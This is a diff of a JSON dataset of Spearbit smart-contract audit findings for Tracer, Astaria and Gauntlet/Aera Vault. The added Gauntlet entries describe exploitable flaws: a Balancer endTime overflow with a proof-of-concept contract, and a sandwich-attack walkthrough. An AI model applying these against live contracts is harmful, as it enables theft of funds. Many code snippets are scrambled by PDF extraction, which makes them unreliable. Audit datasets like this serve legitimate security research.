"Astaria", + "Severity: Informational" ] }, { - "title": "Function complexity can be reduced from linear to constant by rewriting loops", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The add() function of the PriceObserver contract shifts an entire array if the buffer is full, and the SMA() function of the SMAOracle contract sums the values of an array to calculate its average. Both of these functions have O(n) complexity and could be rewritten to have O(1) complexity. This would save gas and possibly increase the buffer size. 31 contract PriceObserver is Ownable, IPriceObserver { ... * @dev If the backing array is full (i.e., `length() == capacity()`, then * it is rotated such that the oldest price observation is deleted function add(int256 x) external override onlyWriter returns (bool) { ... if (full()) { leftRotateWithPad(x); ... } function leftRotateWithPad(int256 x) private { uint256 n = length(); /* linear scan over the [1, n] subsequence */ for (uint256 i = 1; i < n; i++) { observations[i - 1] = observations[i]; } ... } contract SMAOracle is IOracleWrapper { * @dev O(k) complexity due to linear traversal of the final `k` elements of `xs` ... function SMA(int256[24] memory xs, uint256 n, uint256 k) public pure returns (int256) { ... /* linear scan over the [n - k, n] subsequence */ for (uint256 i = n - k; i < n; i++) { S += xs[i]; } ... } }", + "title": "tokenURI should revert on non-existing tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "As per ERC721 standard, tokenURI() needs to revert if tokenId doesn't exist. The current code returns empty string for all inputs.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Unused observer state variable in PoolKeeper", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "There is no use for the observer state variable. It is only used in performUpkeepSinglePool in a require statement to check if is set. address public observer; function setPriceObserver(address _observer) external onlyOwner { ... observer = _observer; ... function performUpkeepSinglePool(...) require(observer != address(0), \"Observer not initialized\"); ...", + "title": "Inheriting the same contract twice", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "VaultImplementation inherits from AstariaVaultBase (reference). Hence, there is no need to inherit AstariaVaultBase in Vault and PublicVault contract as they both inherit VaultImplementation already.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Usage of temporary variable instead of type casting in PoolKeeper.performUpkeepSinglePool()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The pool temporary variable is used to cast the address to ILeveragedPool. Casting the address directly where the pool variable is used saves gas, as _pool is calldata.", + "title": "No need to re-cast variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Code above highlights redundant type castings. ERC721 CT = ERC721(address(COLLATERAL_TOKEN())); ... address(msg.sender) These type castings are casting variables to the same type.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Events and event emissions can be optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "PoolFactory.deployPool() would result in: Having a single DeployCommitter event to be emitted after setQuoteAndPool() in 1. Having better UX/event tracking and alignment with the current behavior to emit events during the Factory deployment. 2. Removing the QuoteAndPoolChanged event that is emitted only once during the lifetime of the PoolCommitter during PoolFactory.deployPool(). 3. Removing the ChangeIntervalSet emission in PoolCommitter.initialize(). The changeInterval has not really changed, it was initialized. This can be tracked by the DeployCommitter event.", + "title": "Comments do not match implementation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": " Scenario 1 & 2: Comments note where each parameter ends in a packed byte array, or parameter width in bytes. The comments are outdated. Scenario 3: The unless is not implemented.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Multi-paid claim rewards should be sent only if nonzero", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "In both multiPaidClaimMultiplePoolCommitters() and multiPaidClaimSinglePoolCommitter(), there could be cases where the reward sent back to the claimer is zero. In these scenarios, the reward value should be checked to avoid wasting gas.", + "title": "Incomplete Natspec", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": " LienToken.sol#L616 s, @return missing LienToken.sol#L738-L750 s, position, @return missing CollateralToken.sol#L616-L628 tokenId_ missing 93 VaultImplementation.sol#L153-L165 The second * on /** is missing causing the compiler to ignore the Natspec. The Natspec appears to document an old function interface. Params do not match with the function inputs. VaultImplementation.sol#L298-L310 missing stack and return vaule AstariaRouter.sol#L75-L77 @param NatSpec is missing for _WITHDRAW_IMPL, _BEACON_PROXY_IMPL and _- CLEARING_HOUSE_IMPL AstariaRouter.sol#L44-L47 : Leave a comment that AstariaRouter also acts as an IBeacon for different cloned contracts.", "labels": [ - "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Spearbit", + "Astaria", + "Severity: Informational" ] }, { - "title": "Unnecessary quad arithmetic use where integer arithmetic works", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The ABDKMathQuad library is used to compute a division which is then truncated with toUint(). Semantically this is equivalent to a standard uint division, which is more gas efficient. The same library is also unnecessarily used to compute keepers reward. This can be safely done by using standard uint computation. function appropriateUpdateIntervalId(...) ... uint256 factorDifference = ABDKMathQuad.toUInt(divUInt(frontRunningInterval, updateInterval)); function keeperReward(...) ... int256 wadRewardValue = ABDKMathQuad.toInt( ABDKMathQuad.add( ABDKMathQuad.fromUInt(_keeperGas), ABDKMathQuad.div( ( ABDKMathQuad.div( (ABDKMathQuad.mul(ABDKMathQuad.fromUInt(_keeperGas), _tipPercent)), ABDKMathQuad.fromUInt(100) ) ), FIXED_POINT ) ) ); uint256 decimals = IERC20DecimalsWrapper(ILeveragedPool(_pool).quoteToken()).decimals(); uint256 deWadifiedReward = PoolSwapLibrary.fromWad(uint256(wadRewardValue), decimals);", + "title": "Cannot have multiple liens with same parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Lien Ids are computed by hashing the Lien struct itself. This means that no two liens can have the same parameters (e.g. same amount, rate, duration, etc.).", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Custom errors should be used", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "In the latest Solidity versions it is possible to replace the strings used to encode error messages with custom errors, which are more gas efficient. AutoClaim.sol: PoolCommitter\"); ,! AutoClaim.sol: AutoClaim.sol: PoolCommitter\"); ,! AutoClaim.sol: require(poolFactory.isValidPoolCommitter(msg.sender), \"msg.sender not valid require(_poolFactoryAddress != address(0), \"PoolFactory address == 0\"); require(poolFactory.isValidPoolCommitter(poolCommitterAddress), \"Invalid require(users.length == poolCommitterAddresses.length, \"Supplied arrays must be same length\"); ,! ChainlinkOracleWrapper.sol: require(_oracle != address(0), \"Oracle cannot be 0 address\"); ChainlinkOracleWrapper.sol: require(_deployer != address(0), \"Deployer cannot be 0 address\"); ChainlinkOracleWrapper.sol: require(_decimals <= MAX_DECIMALS, \"COA: too many decimals\"); ChainlinkOracleWrapper.sol: require(answeredInRound >= roundID, \"COA: Stale answer\"); ChainlinkOracleWrapper.sol: require(timeStamp != 0, \"COA: Round incomplete\"); ERC20_Cloneable.sol: ERC20_Cloneable.sol: InvariantCheck.sol: InvariantCheck.sol: LeveragedPool.sol: require(msg.sender == owner, \"msg.sender not owner\"); require(_owner != address(0), \"Owner: setting to 0 address\"); require(_factory != address(0), \"Factory address cannot be null\"); require(poolFactory.isValidPool(poolToCheck), \"Pool is invalid\"); require(!paused, \"Pool is paused\"); 36 LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: require(!paused, \"Pool is paused\"); require(!paused, \"Pool is paused\"); require(msg.sender == keeper, \"msg.sender not keeper\"); require(msg.sender == invariantCheckContract, \"msg.sender not invariantCheckContract\"); ,! LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: address\"); ,! LeveragedPool.sol: address\"); ,! LeveragedPool.sol: be 0 address\"); ,! LeveragedPool.sol: cannot be 0 address\"); ,! LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: address\"); ,! LeveragedPool.sol: address\"); ,! LeveragedPool.sol: be 0 address\"); ,! LeveragedPool.sol: require(msg.sender == poolCommitter, \"msg.sender not poolCommitter\"); require(msg.sender == governance, \"msg.sender not governance\"); require(initialization._feeAddress != address(0), \"Fee address cannot be 0 require(initialization._quoteToken != address(0), \"Quote token cannot be 0 require(initialization._oracleWrapper != address(0), \"Oracle wrapper cannot require(initialization._settlementEthOracle != address(0), \"Keeper oracle require(initialization._owner != address(0), \"Owner cannot be 0 address\"); require(initialization._keeper != address(0), \"Keeper cannot be 0 address\"); require(initialization._longToken != address(0), \"Long token cannot be 0 require(initialization._shortToken != address(0), \"Short token cannot be 0 require(initialization._poolCommitter != address(0), \"PoolCommitter cannot require(initialization._invariantCheckContract != address(0), \"InvariantCheck cannot be 0 address\"); require(initialization._fee < PoolSwapLibrary.WAD_PRECISION, \"Fee >= 100%\"); require(initialization._secondaryFeeSplitPercent <= 100, \"Secondary fee split cannot exceed 100%\"); as old governance address\"); ,! LeveragedPool.sol: LeveragedPool.sol: ,! LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: ,! LeveragedPool.sol: address\"); ,! LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: PoolCommitter.sol: PoolCommitter.sol: PoolCommitter.sol: PoolCommitter.sol: PoolCommitter.sol: PoolCommitter.sol: ,! PoolCommitter.sol: PoolCommitter.sol: PoolCommitter.sol: ,! PoolCommitter.sol: PoolCommitter.sol: invariantCheckContract\"); require(initialization._updateInterval != 0, \"Update interval cannot be 0\"); require(intervalPassed(), \"Update interval hasn't passed\"); require(account != address(0), \"Account cannot be 0 address\"); require(msg.sender == _oldSecondaryFeeAddress); require(_keeper != address(0), \"Keeper address cannot be 0 address\"); require(_governance != governance, \"New governance address cannot be same require(_governance != address(0), \"Governance address cannot be 0 require(governanceTransferInProgress, \"No governance change active\"); require(msg.sender == _provisionalGovernance, \"Not provisional governor\"); require(paused, \"Pool is live\"); require(!paused, \"Pool is paused\"); require(msg.sender == governance, \"msg.sender not governance\"); require(!paused, \"Pool is paused\"); require(!paused, \"Pool is paused\"); require(!paused, \"Pool is paused\"); require(msg.sender == invariantCheckContract, \"msg.sender not require(msg.sender == factory, \"Committer: not factory\"); require(msg.sender == leveragedPool, \"msg.sender not leveragedPool\"); require(msg.sender == user || msg.sender == address(autoClaim), \"msg.sender not committer or AutoClaim\"); require(_factory != address(0), \"Factory address cannot be 0 address\"); require(_invariantCheckContract != address(0), \"InvariantCheck address cannot be 0 address\"); ,! PoolCommitter.sol: PoolCommitter.sol: PoolCommitter.sol: PoolCommitter.sol: require(_autoClaim != address(0), \"AutoClaim address cannot be null\"); require(_mintingFee < PoolSwapLibrary.WAD_PRECISION, \"Minting fee >= 100%\"); require(_burningFee < PoolSwapLibrary.WAD_PRECISION, \"Burning fee >= 100%\"); require(userCommit.balanceLongBurnAmount <= balance.longTokens, \"Insufficient pool tokens\"); ,! PoolCommitter.sol: require(userCommit.balanceShortBurnAmount <= balance.shortTokens, ,! \"Insufficient pool tokens\"); 37 ,! PoolCommitter.sol: PoolCommitter.sol: address\"); ,! PoolCommitter.sol: address\"); ,! PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: ,! PoolFactory.sol: ,! PoolFactory.sol: ,! PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolKeeper.sol: PoolKeeper.sol: PoolKeeper.sol: PoolKeeper.sol: PoolKeeper.sol: PoolSwapLibrary.sol: PoolSwapLibrary.sol: PoolSwapLibrary.sol: PoolSwapLibrary.sol: PriceObserver.sol: PriceObserver.sol: PriceObserver.sol: SMAOracle.sol: ,! SMAOracle.sol: PoolCommitter.sol: require(userCommit.balanceLongBurnMintAmount <= balance.longTokens, \"Insufficient pool tokens\"); ,! PoolCommitter.sol: require(userCommit.balanceShortBurnMintAmount <= balance.shortTokens, \"Insufficient pool tokens\"); require(amount > 0, \"Amount must not be zero\"); require(_quoteToken != address(0), \"Quote token address cannot be 0 require(_leveragedPool != address(0), \"Leveraged pool address cannot be 0 require(_feeReceiver != address(0), \"Address cannot be null\"); require(_poolKeeper != address(0), \"PoolKeeper not set\"); require(autoClaim != address(0), \"AutoClaim not set\"); require(invariantCheck != address(0), \"InvariantCheck not set\"); require(IOracleWrapper(deploymentParameters.oracleWrapper).deployer() == msg.sender,\"Deployer must be oracle wrapper owner\"); require(deploymentParameters.leverageAmount >= 1 && deploymentParameters.leverageAmount <= maxLeverage,\"PoolKeeper: leveraged amount invalid\"); require(IERC20DecimalsWrapper(deploymentParameters.quoteToken).decimals() <= MAX_DECIMALS,\"Decimal precision too high\"); require(_poolKeeper != address(0), \"address cannot be null\"); require(_invariantCheck != address(0), \"address cannot be null\"); require(_autoClaim != address(0), \"address cannot be null\"); require(newMaxLeverage > 0, \"Maximum leverage must be non-zero\"); require(_feeReceiver != address(0), \"address cannot be null\"); require(newFeePercent <= 100, \"Secondary fee split cannot exceed 100%\"); require(_fee <= 0.1e18, \"Fee cannot be > 10%\"); require(_mintingFee <= 1e18, \"Fee cannot be > 100%\"); require(_burningFee <= 1e18, \"Fee cannot be > 100%\"); require(_changeInterval <= 1e18, \"Change interval cannot be > 100%\"); require(msg.sender == address(factory), \"Caller not factory\"); require(_factory != address(0), \"Factory cannot be 0 address\"); require(_observer != address(0), \"Price observer cannot be 0 address\"); require(firstPrice > 0, \"First price is non-positive\"); require(observer != address(0), \"Observer not initialized\"); require(timestamp >= lastPriceTimestamp, \"timestamp in the past\"); require(price != 0, \"price == 0\"); require(price != 0, \"price == 0\"); require(price != 0, \"price == 0\"); require(msg.sender == writer, \"PO: Permission denied\"); require(i < length(), \"PO: Out of bounds\"); require(_writer != address(0), \"PO: Null address not allowed\"); require(_spotOracle != address(0) && _observer != address(0) && _deployer require(_periods > 0 && _periods <= IPriceObserver(_observer).capacity(), require(_spotDecimals <= MAX_DECIMALS, \"SMA: Decimal precision too high\"); require(_updateInterval != 0, \"Update interval cannot be 0\"); require(block.timestamp >= lastUpdate + updateInterval, \"SMA: Too early to require(k > 0 && k <= n && k <= uint256(type(int256).max), \"SMA: Out of != address(0),\"SMA: Null address forbidden\"); \"SMA: Out of bounds\"); ,! SMAOracle.sol: SMAOracle.sol: SMAOracle.sol: update\"); ,! SMAOracle.sol: ,! bounds\");", + "title": "Redundant unchecked can be removed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "There are no arithmetic operations in these unchecked blocks. For clarity, it can be removed.", "labels": [ "Spearbit", - "Tracer", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational LienToken.sol#L264," ] }, { - "title": "Different updateIntervals in SMAOracle and pools", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The updateIntervals for the pools and the SMAOracles are different. If the updateInterval for SMAOracle is larger than the updateInterval for poolUpkeep(), then the oracle price update could happen directly after the poolUpkeep(). It is possible to perform permissionless calls to poll(). In combination with a delayed poolUpkeep() an attacker could manipulate the timing of the SMAOracle price, because after a call to poll() it cant be called again until updateInterval has passed. contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function initialize(ILeveragedPool.Initialization calldata initialization) external override initializer { ,! ... updateInterval = initialization._updateInterval; ... } function poolUpkeep(... ) external override onlyKeeper { require(intervalPassed(), \"Update interval hasn't passed\"); ... } function intervalPassed() public view override returns (bool) { unchecked { return block.timestamp >= lastPriceTimestamp + updateInterval; } } contract SMAOracle is IOracleWrapper { constructor(..., uint256 _updateInterval, ... ) { updateInterval = _updateInterval; } function poll() external override returns (int256) { require(block.timestamp >= lastUpdate + updateInterval, \"SMA: Too early to update\"); return update(); } }", + "title": "Argument name reuse with different meaning across contracts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "ken.LienActionEncumber receiver is the lender (the receiver of the LienToken)", "labels": [ "Spearbit", - "Tracer", + "Astaria", "Severity: Informational" ] }, { - "title": "Tight coupling between LeveragedPool and PoolCommitter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The LeveragedPool and PoolCommitter contracts call each other back and forth. This could be optimized to make the code clearer and perhaps save some gas. Here is an example: contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function poolUpkeep(...) external override onlyKeeper { ... IPoolCommitter(poolCommitter).executeCommitments(_boundedIntervals, _numberOfIntervals); ... } } contract PoolCommitter is IPoolCommitter, Initializable { function executeCommitments(...) external override onlyPool { ... uint256 lastPriceTimestamp = pool.lastPriceTimestamp(); uint256 updateInterval = pool.updateInterval(); ... } } // call to first contract // call to first contract", + "title": "Licensing conflict on inherited dependencies", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The version of Solmate contracts depended in tne gpl repository on are AGPL Licensed, making the gpl repository adopt the same license. This license is incompatible with the currently UNLICENSED Astaria related contracts.", "labels": [ "Spearbit", - "Tracer", + "Astaria", "Severity: Informational" ] }, { - "title": "Code in SMA() is hard to read", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The SMA() function checks for k being smaller or equal to uint256(type(int256).max), a value somewhat difficult to read. Additionally, the number 24 is hardcoded. Note: This issue was also mentioned in Runtime Verification report: B15 PriceObserver - avoid magic values function SMA( int256[24] memory xs, uint256 n, uint256 k) public pure returns (int256) { ... require(k > 0 && k <= n && k <= uint256(type(int256).max), \"SMA: Out of bounds\"); ... for (uint256 i = n - k; i < n; i++) { S += xs[i]; } ... }", + "title": "Important Balancer fields can be overwritten by EndTime", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Balancers ManagedPool uses 32 bit values for startTime and endTime but it does not verify if those values exist within that range. Values are stored in a 32-byte _miscData slot in BasePool via the insertUint32() function. Nevertheless, this function does not strip any excess bits, resulting in other fields stored in _miscData to be overwritten. In the version that Aera Vault uses only the \"restrict LP\" field can be overwritten and by carefully crafting the value of endTime, the \"restrict LP\" boolean can be switched off, allowing anyone to use joinPool. The Manager could cause this behavior via the updateWeightsGradually() function while the Owner could do it via enableTradingWithWeights(). Note: This issue has been reported to Balancer by the Spearbit team. contract ManagedPool is BaseWeightedPool, ReentrancyGuard { // f14de92ac443d6daf1f3a42025b1ecdb8918f22e 32 bits | 1 bit | | restrict LP | end time 32 bits | ] 7 bits | start time | total tokens | swap flag ] 1 bit | // [ 64 bits // [ reserved | // |MSB | 119 bits | unused function _startGradualWeightChange(uint256 startTime, uint256 endTime, ... ) ... { ... _setMiscData( _getMiscData().insertUint32(startTime, _START_TIME_OFFSET).insertUint32(endTime, ,! _END_TIME_OFFSET) ); // this convert the values to 32 bits ... } } In the latest version of ManagedPool many more fields can be overwritten, including: LP flag Fee end/Fee start Swap flag contract ManagedPool is BaseWeightedPool, AumProtocolFeeCache, ReentrancyGuard { // current version // [ 64 bits ] // [ swap fee | LP flag | fee end | swap flag | fee start | end swap | end wgt | start wgt ] LSB| // |MSB 1 bit | 31 bits | | 31 bits 32 bits | 64 bits | 32 bits 1 bit | | The following POC shows how fields can be manipulated. // SPDX-License-Identifier: MIT pragma solidity ^0.8.13; import \"hardhat/console.sol\"; contract checkbalancer { uint256 private constant _MASK_1 = 2**(1) - 1; uint256 private constant _MASK_31 = 2**(31) - 1; uint256 private constant _MASK_32 = 2**(32) - 1; uint256 private constant _MASK_64 = 2**(64) - 1; uint256 private constant _MASK_192 = 2**(192) - 1; 5 | | 1 bit 64 bits | | 31 bits 1 bit | 31 bits | // [ 64 bits ] // [ swap fee | LP flag | fee end | swap flag | fee start | end swap | end wgt | start wgt ] LSB| // |MSB uint256 private constant _WEIGHT_START_TIME_OFFSET = 0; uint256 private constant _WEIGHT_END_TIME_OFFSET = 32; uint256 private constant _END_SWAP_FEE_PERCENTAGE_OFFSET = 64; uint256 private constant _FEE_START_TIME_OFFSET = 128; uint256 private constant _SWAP_ENABLED_OFFSET = 159; uint256 private constant _FEE_END_TIME_OFFSET = 160; uint256 private constant _MUST_ALLOWLIST_LPS_OFFSET = 191; uint256 private constant _SWAP_FEE_PERCENTAGE_OFFSET = 192; 32 bits | 32 bits function insertUint32(bytes32 word,uint256 value,uint256 offset) internal pure returns (bytes32) { bytes32 clearedWord = bytes32(uint256(word) & ~(_MASK_32 << offset)); return clearedWord | bytes32(value << offset); } function decodeUint31(bytes32 word, uint256 offset) internal pure returns (uint256) { return uint256(word >> offset) & _MASK_31; } function decodeUint32(bytes32 word, uint256 offset) internal pure returns (uint256) { return uint256(word >> offset) & _MASK_32; } function decodeUint64(bytes32 word, uint256 offset) internal pure returns (uint256) { return uint256(word >> offset) & _MASK_64; } function decodeBool(bytes32 word, uint256 offset) internal pure returns (bool) { return (uint256(word >> offset) & _MASK_1) == 1; } function insertBits192(bytes32 word,bytes32 value,uint256 offset) internal pure returns (bytes32) { bytes32 clearedWord = bytes32(uint256(word) & ~(_MASK_192 << offset)); return clearedWord | bytes32((uint256(value) & _MASK_192) << offset); } constructor() { bytes32 poolState; bytes32 miscData; uint startTime = 1 + 2*2**32; uint endTime = 3 + 4*2**32 + 5*2**(32+64) + 2**(32+64+31) + 6*2**(32+64+31+1) + ,! 2**(32+64+31+1+31) + 7*2**(32+64+31+1+31+1); poolState = insertUint32(poolState,startTime, _WEIGHT_START_TIME_OFFSET); poolState = insertUint32(poolState,endTime, _WEIGHT_END_TIME_OFFSET); miscData = insertBits192(miscData,poolState,0); decodeUint32(miscData, console.log(\"startTime\", console.log(\"endTime\", decodeUint32(miscData, console.log(\"endSwapFeePercentage\", decodeUint64(miscData, _WEIGHT_START_TIME_OFFSET)); // 1 // 3 _WEIGHT_END_TIME_OFFSET)); _END_SWAP_FEE_PERCENTAGE_OFFSET)); ,! // 4 console.log(\"Fee startTime\", console.log(\"Swap enabled\", console.log(\"Fee endTime\", console.log(\"AllowlistLP\", decodeUint31(miscData, decodeBool(miscData, decodeUint31(miscData, decodeBool(miscData, _FEE_START_TIME_OFFSET)); // 5 _SWAP_ENABLED_OFFSET)); // true _FEE_END_TIME_OFFSET)); // 6 _MUST_ALLOWLIST_LPS_OFFSET)); // ,! true console.log(\"Swap fee percentage\", console.log(\"Swap fee percentage\", decodeUint64(poolState, _SWAP_FEE_PERCENTAGE_OFFSET)); // 7 _SWAP_FEE_PERCENTAGE_OFFSET)); // 0 decodeUint64(miscData, due to miscData conversion } ,! }", "labels": [ "Spearbit", - "Tracer", - "Severity: Informational" + "Gauntlet", + "Severity: Critical Risk" ] }, { - "title": "Code is chain-dependant due to fixed block time and no support for EIP-1559", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "The PoolKeeper contract has several hardcoded assumptions about the chain on which it will be deployed. It has no support for EIP-1559 and doesnt use block.basefee. On Ethereum Mainnet the blocktime will change to 12 seconds with the ETH2 merge. The Secureum CARE-X report also has an entire discussion about other chains. contract PoolKeeper is IPoolKeeper, Ownable { ... uint256 public constant BLOCK_TIME = 13; /* in seconds */ ... /// Captures fixed gas overhead for performing upkeep that's unreachable /// by `gasleft()` due to our approach to error handling in that code uint256 public constant FIXED_GAS_OVERHEAD = 80195; ... }", + "title": "sweep function should prevent Treasury from withdrawing pools BPTs", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "The current sweep() implementation allows the vault owner (the Treasury) to sweep any token owned by the vault including BPTs (Balancer Pool Tokens) that have been minted by the Vault during the pools initialDeposit() function call. The current vault implementation does not need those BPTs to withdraw funds because they are passed directly through the AssetManager flow via withdraw()/finalize(). Being able to withdraw BPTs would allow the Treasury to: Withdraw funds without respecting the time period between initiateFinalization() and finalize() calls. Withdraw funds without respecting Validator allowance() limits. Withdraw funds without paying the managers fee for the last withdraw(). finalize the pool, withdrawing all funds and selling valueless BPTs on the market. Sell or rent out BPTs and withdraw() funds afterwards, thus doubling the funds. Swap fees would not be paid because Treasury could call setManager(newManager), where the new manager is someone controlled by the Treasury, subsequently calling setSwapFee(0) to remove the swap fee, which would be applied during an exitPool() event. Note: Once the BPT is retrieved it can also be used to call exitPool(), as the mustAllowlistLPs check is ignored in exitPool().", "labels": [ "Spearbit", - "Tracer", - "Severity: Informational" + "Gauntlet", + "Severity: Critical Risk" ] }, { - "title": "ABDKQuad-related constants defined outside PoolSwapLibrary", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "Some ABDKQuad-related constants are defined outside of the PoolSwapLibrary while others are shadowing the ones defined inside the library. As all ABDKQuad-related logic is contained in the library its less error prone to have any ABDKQuad-related definitions in the same file. The constant one is lowercase, while usually constants are uppercase. contract PoolCommitter is IPoolCommitter, Initializable { bytes16 public constant one = 0x3fff0000000000000000000000000000; ... // Set max minting fee to 100%. This is a ABDKQuad representation of 1 * 10 ** 18 bytes16 public constant MAX_MINTING_FEE = 0x403abc16d674ec800000000000000000; } library PoolSwapLibrary { /// ABDKMathQuad-formatted representation of the number one bytes16 public constant one = 0x3fff0000000000000000000000000000; }", + "title": "Manager can cause an immediate weight change", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Balancers ManagedPool uses 32 bit values for startTime and endTime but it does not verify if those values exist within that range. When endTime is set to 2**32 it becomes larger than startTime so the _require(startTime <= endTime, ...) statement will not revert. When endTime is converted to 32 bits it will get a value of 0, so in _calcu- lateWeightChangeProgress() the test if (currentTime >= endTime) ... will be true, causing the weight to immediately reach the end value. This way the Manager can cause an immediate weight change via the updateWeightsGradually() function and open arbitrage opportunities. Note: startTime is also subject to this overflow problem. Note: the same issues occur in the latest version of ManagedPool. Note: This issue has been reported to Balancer by the Spearbit team. 7 Also see the following issues: Managed Pools are still undergoing development and may contain bugs and/or change significantly Important fields of Balancer can be overwritten by EndTime contract ManagedPool is BaseWeightedPool, ReentrancyGuard { function updateWeightsGradually(uint256 startTime, uint256 endTime, ... ) { ... uint256 currentTime = block.timestamp; startTime = Math.max(currentTime, startTime); _require(startTime <= endTime, Errors.GRADUAL_UPDATE_TIME_TRAVEL); // will not revert if ,! endTime == 2**32 ... _startGradualWeightChange(startTime, endTime, _getNormalizedWeights(), endWeights, tokens); } function _startGradualWeightChange(uint256 startTime, uint256 endTime, ... ) ... { ... _setMiscData( _getMiscData().insertUint32(startTime, _START_TIME_OFFSET).insertUint32(endTime, ,! _END_TIME_OFFSET) ); // this convert the values to 32 bits ... } function _calculateWeightChangeProgress() private view returns (uint256) { uint256 currentTime = block.timestamp; bytes32 poolState = _getMiscData(); uint256 startTime = poolState.decodeUint32(_START_TIME_OFFSET); uint256 endTime = poolState.decodeUint32(_END_TIME_OFFSET); if (currentTime >= endTime) { // will be true if endTime == (2**32) capped to 32 bits == 0 return FixedPoint.ONE; } else ... ... } }", "labels": [ "Spearbit", - "Tracer", - "Severity: Informational" + "Gauntlet", + "Severity: High Risk" ] }, { - "title": "Lack of a state to allow withdrawal of tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", - "body": "Immediately after the invariants dont hold and the pool has been paused, Governance can withdraw the collateral (quote). It might be prudent to create a separate state besides paused, such that unpause actions cant happen anymore to indicate withdrawal intention. Note: the comment in withdrawQuote() is incorrect. Pool must be paused. /** ... * @dev Pool must not be paused // comment not accurate ... */ ... function withdrawQuote() external onlyGov { require(paused, \"Pool is live\"); IERC20 quoteERC = IERC20(quoteToken); uint256 balance = quoteERC.balanceOf(address(this)); IERC20(quoteToken).safeTransfer(msg.sender, balance); emit QuoteWithdrawn(msg.sender, balance); }", + "title": "deposit and withdraw functions are susceptible to sandwich attacks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Gauntlet-Spearbit-Security-Review.pdf", + "body": "Transactions calling the deposit() function are susceptible to sandwich attacks where an attacker can extract value from deposits. A similar issue exists in the withdraw() function but the minimum check on the pool holdings limits the attacks impact. Consider the following scenario (swap fees ignored for simplicity): 1. Suppose the Balancer pool contains two tokens, WETH and DAI, and weights are 0.5 and 0.5. Currently, there is 1 WETH and 3k DAI in the pool and WETH spot price is 3k. 2. The Treasury wants to add another 3k DAI into the Aera vault, so it calls the deposit() function. 3. The attacker front-runs the Treasurys transaction. They swap 3k DAI into the Balancer pool and get out 0.5 WETH. The weights remain 0.5 and 0.5, but because WETH and DAI balances become 0.5 and 6k, WETHs spot price now becomes 12k. 4. Now, the Treasurys transaction adds 3k DAI into the Balancer pool and upgrades the weights to 0.5*1.5: 0.5 = 0.6: 0.4. 5. The attacker back-runs the transaction and swaps the 0.5 WETH they got in step 3 back to DAI (and recovers the WETHs spot price 